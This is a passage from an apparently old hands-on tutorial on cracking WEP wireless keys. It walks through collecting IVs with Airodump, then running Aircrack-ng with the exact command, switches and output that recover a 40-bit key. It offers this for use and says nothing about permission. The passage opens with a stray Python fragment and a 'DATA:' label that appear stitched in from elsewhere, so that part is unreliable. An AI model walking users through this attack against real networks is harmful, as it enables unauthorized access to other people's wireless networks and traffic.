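            for b, ap in aps.items() if ap.enc in WEAK}
```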



DATA:

As I mentioned before, it is impossible to give an exact number of IVs that need to be collected to crack a WEP key. The more we can get, the more chance we have of cracking the WEP key. From trial and error I have found that I can crack a 40 bit WEP key in a few seconds with around 250,000 to 400,000 IVs. You may be able to do it with more IVs or fewer; it is different every time.
For a 104 bit WEP key you will need anything up to 2,000,000 IVs and maybe even more. The fewest IVs I have ever been able to use in one of my lessons for a 104 bit crack is 710,325, and this took just 4 minutes 31 seconds to crack, but in other lessons I have had to collect in excess of 2 million.

This is where Airodump's very handy feature of appending to existing files is useful. If you have collected 500,000 IVs and run a 64 bit attack on the file but are unsuccessful, simply start Airodump again and use the same file name; all the new IVs will be added to the ones you already have, so you don't have to start from the beginning all over again!

So now sit there and wait for the number of IVs that you decided on to be collected!


Aircrack-ng


So once you have decided you have enough IVs, press CTRL + C to end Airodump. I have collected 413,994 IVs for this crack.

You will still have the white command prompt open, so just type aircrack-ng at the prompt (or cd to it first).

You will now get a list of "usages" for Aircrack that you can use.
Code:

Common options:

-a : force attack mode (1/WEP, 2/WPA-PSK)
-e : target selection: network identifier
-b : target selection: access point's MAC
-q : enable quiet mode (no status output)
-w : path to a dictionary file

Static WEP cracking options:

-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-d : debug - specify beginning of the key
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 152 / 256
-i : WEP key index (1 to 4), default: any
-f : bruteforce fudge factor, default: 2
-k : disable one attack method (1 to 17)
-x : do bruteforce the last two keybytes
-y : experimental single bruteforce mode

Aircrack-ng 0.3 - (C) 2006 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org

usage: aircrack-ng [options]


As this paper is getting a bit long I will just cover the options we need to crack a WEP key from a file. If you want to try the
other options out..try them and see what you come up with. The helpful descriptions provided speak for themselves really.

So we have collected 413,994 IVs, which is not enough for a 104 bit WEP crack, so we will try a 40 bit WEP crack instead (we can always add IVs to the file later on if it does not work).

So we issue the following command to Aircrack:
Code:
C:Docu~
okia>aircrack-ng -n 64 WEP1.ivs


We use the -n 64 switch to tell it we think it is a 64 bit WEP key.

You can also use the -f switch, which is the fudge factor switch.
In the programmers own words:

"By default, this parameter [fudge factor] is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the brute force level: cracking will take more time, but with a higher likelihood of success."

So if you have no joy cracking it, you can try again with the -f 5 switch.


If you forget what you called the Airodump file it is saved in the following directory by default:

C:\Documents and Settings\%User Name%

If you chose to save only the IVs it will be an .ivs file; if you answered no and wanted to save everything, it will be a .cap file.

Our scan only turned up one network, so Aircrack will only crack those IVs. If you have more than one network in the capture, you will need to use the -m switch to tell it the BSSID of the AP whose packets you want to use.



The result of issuing our command is:
Code:
Aircrack-ng 0.3


[00:00:00] Tested 1231 keys (got 413994 IVs)

KB depth byte(vote)
0 0/ 4 A6( 68) 82( 40) EE( 20) E4( 15) 18( 5) 23( 5) 04( 3)
1 0/ 3 22( 75) 52( 19) 43( 15) 5A( 13) 21( 8) 8A( 5) B2( 4)
2 0/ 1 04( 76) 33( 8) 8B( 5) C8( 5) 47( 0) 62( 0) 63( 0)
3 0/ 1 09( 106) FB( 15) ED( 12) 58( 12) F0( 11) 29( 7) C8( 5)
4 0/ 1 EB( 153) 19( 27) 0E( 15) 38( 15) B8( 13) E0( 10) DC( 9)

KEY FOUND! [ A6:22:04:09:EB ]


There you have it: our 40 bit WEP key is A6:22:04:09:EB.

With 413,994 IVs this key took Aircrack less than 1 second to crack, which is an example of how good Aircrack truly is. With around 250,000 IVs, chances are it would only take a few seconds more to crack, but I like to collect a few more IVs to be on the safe side.

Like I said, the programmer has done all the hard work for us; we just need to tell it what to do. For the end user's part, WEP cracking is not a skilful hack in any way whatsoever (we just tell Aircrack what we want it to do), unless you want to write your own program for it!